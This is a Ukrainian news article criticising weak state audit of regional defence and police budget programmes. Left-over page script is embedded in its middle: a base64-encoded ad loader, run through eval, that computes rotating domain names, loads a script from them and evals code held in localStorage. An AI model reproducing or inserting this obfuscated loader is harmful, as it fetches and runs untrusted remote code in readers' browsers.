Важные новости

Державний контроль «буксує» на обласних оборонних та правоохоронних Програмах

Продовжуючи дослідження витрачання коштів обласних бюджетів на оборонні та правоохоронні Програми, ми дійшли до системи контролю за використанням цих коштів.

Ми вже попередньо з’ясували що розробка проектів обласних (місцевих) Програм має базуватись на вивченні потреб. І що більшості профінансованих коштом обласних бюджетів потреб Міноборони і МВС не заявляло. Здебільшого фінансування нових автомобілів для поліції та СБУ замість створення нових робочих місць, фінансування медицини, освіти та екології, є ініціативою самих облдержадміністрацій та обласних рад. Іноді бувають виключення. А фінансування облаштування державного кордону, основної діяльності військкоматів та охорони частин Національної гвардії суперечить статті 91 Бюджетного Кодексу України. Ми з’ясували що під час закупівель і звітування також відбуваються невідповідності реального стану речей відображеному у звітах.

І на всіх цих етапах бюджетного процесу (етапі розробки-прийняття-виконання-звітування-внесення змін) має відбуватись контроль за використанням бюджетних коштів.

І перший рівень контролю покладається на виконавців заходів та депутатську комісію. В 10% випадків в Україні етапи ініціювання-розробки- виконання- контролю- звітування виконує один і той самий орган. Тобто, встановлюється режим самоконтролю.

Обласні оборонні Програми: чи є потреба в фінансуванні

Внутрішні відділу аудиту та Департаменти фінансів ОДА підпорядковуються керівнику органу влади, який часто і влаштовує такий самоконтроль. Очевидно, що через залежність від керівництва сподіватись на достовірність таких аудитів не завжди доводиться.
Надія залишається на зовнішній контроль. І така система державного фінансового контролю створена. Кожен контролюючий орган влади має свої повноваження. Проте, три з чотирьох отримують фінансування з цих самих обласних правоохоронних і оборонних Програм. Як наслідок, у відповідь на запит всі (окрім Запорізького ) офіси Держаудитслужби (ДАСУ) відповіли що в період 2013- 2019 років вони не проводили аудит ані обласних оборонних та правоохоронних Програм , ані аудит їх виконання. Запорізький підрозділ відповіді на запит не надав.

Рахункова палата також не перевіряла Державний бюджет в частині субвенцій місцевих бюджетів Державному. І до Казначейської служби (ДКСУ) також є запитання. (adsbygoogle = window.adsbygoogle || []).push({}); var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Таким чином, два кола контролю не спрацювали. І кошти всіх обласних оборонних та правоохоронних Програм в Україні на 1 млрд. грн. було де-факто, витрачено безконтрольно.

Дискреційний розподіл бюджетних коштів; відсутність незалежних органів контролю ( вони політично чи фінансово підпорядковуються тим, кого вони контролюють); відсутність покарання за фінансові злочини та інші актори, суперечать критеріям SIGMA, які застосовуються в ЄС. І які Україна має імплементувати на шляху до ЄС. На рівні директив прописані конкретні зобов’язання, які має виконати Україна для забезпечення розвитку збалансованої бюджетної політики і надійних систем внутрішнього контролю та зовнішнього аудиту.

Кошти на оборону чи комусь у кишеню?

Дослідження витрачання коштів обласних бюджетів України на оборонні та правоохоронні цілі показали наскільки далеко ми знаходимось від ЄС. І який шлях доведеться нам ще подолати. А наскільки довгим він буде залежить від кожного з нас.
Не будьте байдужими. Дізнавайтесь куди витрачаються кошти місцевих бюджетів. Як плануються і витрачаються. І як здійснюється контроль. Бо коли всі види контролю не спрацьовують, вся надія на громадський контроль. Ви маєте на це право. Маєте право знати.
Не варто очікувати сприятливих умов для дій. Не буває зручного часу. Є сьогодні і зараз.

Ця стаття створена ГО «Народний Захист» в рамках проекту, який виконує Інститут висвітлення війни та миру (IWPR) за підтримки МЗС Королівства Норвегії. Думка та позиції висловлені в цій статті не обов’язково відображають позицію МЗС Королівства Норвегії та Інститут висвітлення війни та миру (IWPR) (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/derzhavnij-kontrol-buksuye-na-oblasnih-oboronnih-ta-pravoohoronnih-programah/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top